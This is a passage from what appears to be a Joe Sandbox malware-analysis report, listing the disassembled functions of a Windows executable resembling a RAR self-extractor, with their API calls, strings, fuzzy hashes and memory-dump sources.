                                                                                          • Opcode Fuzzy Hash: 1878960ea2eb97722cec61ebb1d741ed2a4e694c610435a3429d7c38669a801c
                                                                                          • Instruction Fuzzy Hash: 81415E71900219AEEF25EBA4DC85EEF77BDFB58304F0040A6F509E6151EB749B848F61
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strlen$_swprintf_wcschr_wcsrchr
                                                                                          • String ID: %08x
                                                                                          • API String ID: 1593746830-3682738293
                                                                                          • Opcode ID: d311f84d731403f7b33dade2d73386beb34b5e68f463faeaba92e0f782313591
                                                                                          • Instruction ID: c8c7db595ff7cc08f82445983f1dad106a1861c2e0f97600adbc7ca70b50e0a8
                                                                                          • Opcode Fuzzy Hash: d311f84d731403f7b33dade2d73386beb34b5e68f463faeaba92e0f782313591
                                                                                          • Instruction Fuzzy Hash: 3041F372904358AAE730E668CC49ABBB7DCFB85710F14452EFA4CE7186D630DD04C662
                                                                                          APIs
                                                                                          • ShowWindow.USER32(?,00000000), ref: 008885B5
                                                                                          • GetWindowRect.USER32(?,?), ref: 008885DA
                                                                                          • ShowWindow.USER32(?,00000005,?), ref: 00888671
                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00888679
                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 0088868F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Show$RectText
                                                                                          • String ID: RarHtmlClassName
                                                                                          • API String ID: 3937224194-1658105358
                                                                                          • Opcode ID: 34ae09a0684174647653ce9f3b7613faafad8fc493368c44a2c3c5d9acb27159
                                                                                          • Instruction ID: 415ebd6d60b51cf94b99c966ca18b4017f6d7fece265fed59a9d8ded796ad5f2
                                                                                          • Opcode Fuzzy Hash: 34ae09a0684174647653ce9f3b7613faafad8fc493368c44a2c3c5d9acb27159
                                                                                          • Instruction Fuzzy Hash: F3319E31500214EFD725AF649D4CA2BBBA9FB49711F044459FD49AA992EB30E910CBB2
                                                                                          APIs
                                                                                            • Part of subcall function 008992D3: _free.LIBCMT ref: 008992FC
                                                                                          • _free.LIBCMT ref: 0089935D
                                                                                            • Part of subcall function 008959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?), ref: 008959D8
                                                                                            • Part of subcall function 008959C2: GetLastError.KERNEL32(?,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?,?), ref: 008959EA
                                                                                          • _free.LIBCMT ref: 00899368
                                                                                          • _free.LIBCMT ref: 00899373
                                                                                          • _free.LIBCMT ref: 008993C7
                                                                                          • _free.LIBCMT ref: 008993D2
                                                                                          • _free.LIBCMT ref: 008993DD
                                                                                          • _free.LIBCMT ref: 008993E8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                          • Instruction ID: 465b4f414159d33bd9906e71ed4972b32c8547e30c9961abc709a40895e0d6b7
                                                                                          • Opcode Fuzzy Hash: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                          • Instruction Fuzzy Hash: 88111D71941B04F6ED21BBB8DC06FCB7B9CFF00710F484819B2E9E6452DAA5A5044762
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,00890C0B,0088E662), ref: 00890C22
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00890C30
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00890C49
                                                                                          • SetLastError.KERNEL32(00000000,?,00890C0B,0088E662), ref: 00890C9B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: 0d94e8f47b258b9a6361aa6f3c95c65e2e706bb7d0f494d3f92a3fab5728f113
                                                                                          • Instruction ID: 2084799b026af9b96aa2c955e262a2f6e03c9399f2a4939b113c220787a0f515
                                                                                          • Opcode Fuzzy Hash: 0d94e8f47b258b9a6361aa6f3c95c65e2e706bb7d0f494d3f92a3fab5728f113
                                                                                          • Instruction Fuzzy Hash: 6C01883624D7166EBF6937B87C8993B3644FB127B9B38032AF515D54E1FF114C009945
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                          • API String ID: 0-1718035505
                                                                                          • Opcode ID: 6e655e70526bd2ec59c8bf74f446d123c9190e192e3624cc7de4f7515e6dd816
                                                                                          • Instruction ID: 25dccbddbed513aa059bff4f38cfcc10148209edc903e1360830c1d8b987ed2a
                                                                                          • Opcode Fuzzy Hash: 6e655e70526bd2ec59c8bf74f446d123c9190e192e3624cc7de4f7515e6dd816
                                                                                          • Instruction Fuzzy Hash: 1F01F472AC16215B6F202EB09C89AA727D4FB0379A711003AE920D3A44E734C849ABF1
                                                                                          APIs
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 008800AE
                                                                                            • Part of subcall function 0087A8E0: GetVersionExW.KERNEL32(?), ref: 0087A905
                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008800D0
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 008800EA
                                                                                          • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 008800FB
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0088010B
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00880117
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$System$Local$SpecificVersion
                                                                                          • String ID:
                                                                                          • API String ID: 2092733347-0
                                                                                          • Opcode ID: f1920e4871fd575b8f7be64496aea2c36141a5d47ca9261f74d607bf494ae012
                                                                                          • Instruction ID: be223afd889df3b595a9da379242f8590a2c85840fe64e9061e7f030f99158d6
                                                                                          • Opcode Fuzzy Hash: f1920e4871fd575b8f7be64496aea2c36141a5d47ca9261f74d607bf494ae012
                                                                                          • Instruction Fuzzy Hash: 3031F67A1083459BC740EFA8C8849ABB7F8FF98704F04491EF999C3210E734D549CB26
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memcmp
                                                                                          • String ID:
                                                                                          • API String ID: 2931989736-0
                                                                                          • Opcode ID: 97d3b588f02821131ee1c54b109f6105f644aebf269debcfe89d3e719729be1e
                                                                                          • Instruction ID: 8a72856d5d51f0ad19a43ab7091f52cacd97844f965cf5f44cbef676384124c8
                                                                                          • Opcode Fuzzy Hash: 97d3b588f02821131ee1c54b109f6105f644aebf269debcfe89d3e719729be1e
                                                                                          • Instruction Fuzzy Hash: CA21A17164050EEBEB447A14CC81E3B7BADFB547A8F144528FC08DA602FBA4DD414791
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 0087FB07
                                                                                          • EnterCriticalSection.KERNEL32(008B1E74,00000000,?,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF,?), ref: 0087FB15
                                                                                          • new.LIBCMT ref: 0087FB35
                                                                                          • new.LIBCMT ref: 0087FB6B
                                                                                          • LeaveCriticalSection.KERNEL32(008B1E74,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF,?,00008000,?), ref: 0087FB8B
                                                                                          • LeaveCriticalSection.KERNEL32(008B1E74,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF,?,00008000,?), ref: 0087FB96
                                                                                            • Part of subcall function 0087F930: InitializeCriticalSection.KERNEL32(000001A0,008B1E74,00000000,?,?,0087FB88,00000020,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?), ref: 0087F969
                                                                                            • Part of subcall function 0087F930: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF), ref: 0087F973
                                                                                            • Part of subcall function 0087F930: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF), ref: 0087F983
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$CreateLeave$EnterEventH_prologInitializeSemaphore
                                                                                          • String ID:
                                                                                          • API String ID: 3919453512-0
                                                                                          • Opcode ID: 706a23f07de4c30d949dfab38d3a685edc8a2b162db051827c9b29e0cc4c23b2
                                                                                          • Instruction ID: 5baa9be47d7951dff779d9287e89621e792328fa4aa52cc2fe1cb016fb87b212
                                                                                          • Opcode Fuzzy Hash: 706a23f07de4c30d949dfab38d3a685edc8a2b162db051827c9b29e0cc4c23b2
                                                                                          • Instruction Fuzzy Hash: F1117734A002119BDB04AB69EC69B7D77A4FB45764F404239FA09D7695DB70C800DB51
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,008ACBE8,00892674,008ACBE8,?,?,00892213,?,?,008ACBE8), ref: 00896323
                                                                                          • _free.LIBCMT ref: 00896356
                                                                                          • _free.LIBCMT ref: 0089637E
                                                                                          • SetLastError.KERNEL32(00000000,?,008ACBE8), ref: 0089638B
                                                                                          • SetLastError.KERNEL32(00000000,?,008ACBE8), ref: 00896397
                                                                                          • _abort.LIBCMT ref: 0089639D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                          • String ID:
                                                                                          • API String ID: 3160817290-0
                                                                                          • Opcode ID: 412e69f4f71f5467e9f6c56040f1c5ce6f580fc8948d5a2118b3c9843d747c09
                                                                                          • Instruction ID: 4231153b0f1e55ea74e9baa1cdbad6a35c7ef1622ed05e1cccbb6bd34aa12e47
                                                                                          • Opcode Fuzzy Hash: 412e69f4f71f5467e9f6c56040f1c5ce6f580fc8948d5a2118b3c9843d747c09
                                                                                          • Instruction Fuzzy Hash: 2BF0A436605A00A6EF163B2C6D4AB1A2669FBC27B1B3D0114F528D2691FF398C216656
                                                                                          APIs
                                                                                            • Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
                                                                                            • Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341
                                                                                          • EndDialog.USER32(?,00000001), ref: 0088B86B
                                                                                          • GetDlgItemTextW.USER32(?,00000066,00000800), ref: 0088B881
                                                                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 0088B89B
                                                                                          • SetDlgItemTextW.USER32(?,00000066), ref: 0088B8A6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemText$DialogWindow
                                                                                          • String ID: RENAMEDLG
                                                                                          • API String ID: 445417207-3299779563
                                                                                          • Opcode ID: 5c1aa9bd3a11e94406958737a86e7719e8410b20182cb682b71e2581b85d4c8b
                                                                                          • Instruction ID: 8ff6cd5ffb5f2e25ea4c1d50d69bcc353cb76092e2e88a85ff45f0fae7812530
                                                                                          • Opcode Fuzzy Hash: 5c1aa9bd3a11e94406958737a86e7719e8410b20182cb682b71e2581b85d4c8b
                                                                                          • Instruction Fuzzy Hash: 9801B933980215BAE5156E65AE49F377B6CFBC6B81F100425F604F38A0C775A805D773
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00894A90,?,?,00894A30,?,008A7F68,0000000C,00894B87,?,00000002), ref: 00894AFF
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00894B12
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00894A90,?,?,00894A30,?,008A7F68,0000000C,00894B87,?,00000002,00000000), ref: 00894B35
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: fad0f224774751c4f78f187d8d8fef06aa96f913a580ed960e3a9863abb00696
                                                                                          • Instruction ID: f429bd23515e14841464a57d6a0b25367141f912ce5b91d0af438f789dd55b56
                                                                                          • Opcode Fuzzy Hash: fad0f224774751c4f78f187d8d8fef06aa96f913a580ed960e3a9863abb00696
                                                                                          • Instruction Fuzzy Hash: 31F08C30A00208BBEB15AFA4DC19FAEBFB8FB09721F000064B805E2660DB748940CB80
                                                                                          APIs
                                                                                            • Part of subcall function 0087F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0087F324
                                                                                            • Part of subcall function 0087F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087DEC8,Crypt32.dll,?,0087DF4A,?,0087DF2E,?,?,?,?), ref: 0087F346
                                                                                          • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0087DED4
                                                                                          • GetProcAddress.KERNEL32(008B1E58,CryptUnprotectMemory), ref: 0087DEE4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                          • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                          • API String ID: 2141747552-1753850145
                                                                                          • Opcode ID: d46a18e0ac5ac1e254d93ac1f3c1addfe9f21ff41be0504fe68be29facfb4ce3
                                                                                          • Instruction ID: 5324410bb78fc489f1d9f9c93540171f0d2287a20a5f2ab26b2ecf9583112108
                                                                                          • Opcode Fuzzy Hash: d46a18e0ac5ac1e254d93ac1f3c1addfe9f21ff41be0504fe68be29facfb4ce3
                                                                                          • Instruction Fuzzy Hash: 53E04FB1500B43AEEB415B759808B06FBA4FF62714F14C515F068C3B55EBB8D0A89F50
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID:
                                                                                          • API String ID: 269201875-0
                                                                                          • Opcode ID: b29951697111c57a1f4fca0642e27b1014e8feb735c51b6f5ab21398cf3e0ed2
                                                                                          • Instruction ID: 8747fe84c396113f34d7fa9d63078b4d57acc0dc132bae7646f3044a519195a3
                                                                                          • Opcode Fuzzy Hash: b29951697111c57a1f4fca0642e27b1014e8feb735c51b6f5ab21398cf3e0ed2
                                                                                          • Instruction Fuzzy Hash: 2641ED32A00604AFDF15EF78C890A6AB7E1FF86314F2945A9E505EB381DB71AD01CB81
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 008989B8
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008989DB
                                                                                            • Part of subcall function 008959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,008923AA,?,0000015D,?,?,?,?,00892F29,000000FF,00000000,?,?), ref: 00895A2E
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00898A01
                                                                                          • _free.LIBCMT ref: 00898A14
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00898A23
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                          • String ID:
                                                                                          • API String ID: 336800556-0
                                                                                          • Opcode ID: babae00d746f6ebae2cb0e0d0b4ad757ebe6db77558d2a0b20bb9a93bece09d0
                                                                                          • Instruction ID: 3fe08374357eefe77364f0a78479071b9851bd9f9308e2fa7b0334ae04ba0aa2
                                                                                          • Opcode Fuzzy Hash: babae00d746f6ebae2cb0e0d0b4ad757ebe6db77558d2a0b20bb9a93bece09d0
                                                                                          • Instruction Fuzzy Hash: C8017572701626BB2B2176AA6C8CC7B7DADFAC7B61318011AB904D3101DE648C0185B2
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,?,00895E43,00895ADF,?,0089634D,00000001,00000364,?,00892213,?,?,008ACBE8), ref: 008963A8
                                                                                          • _free.LIBCMT ref: 008963DD
                                                                                          • _free.LIBCMT ref: 00896404
                                                                                          • SetLastError.KERNEL32(00000000,?,008ACBE8), ref: 00896411
                                                                                          • SetLastError.KERNEL32(00000000,?,008ACBE8), ref: 0089641A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free
                                                                                          • String ID:
                                                                                          • API String ID: 3170660625-0
                                                                                          • Opcode ID: d0044afa109e9828290c3f5d6b08510612e93d250c5f5e396b7508f7c10c810f
                                                                                          • Instruction ID: 833cf5278cdcb544681732b4c76651db46177a65da2a34cfdc11d0192cff94de
                                                                                          • Opcode Fuzzy Hash: d0044afa109e9828290c3f5d6b08510612e93d250c5f5e396b7508f7c10c810f
                                                                                          • Instruction Fuzzy Hash: FC01D676345B0067AF063B686C89B1B2669FBD277573D4128F424D2682FF39CC215266
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 00899282
                                                                                            • Part of subcall function 008959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?), ref: 008959D8
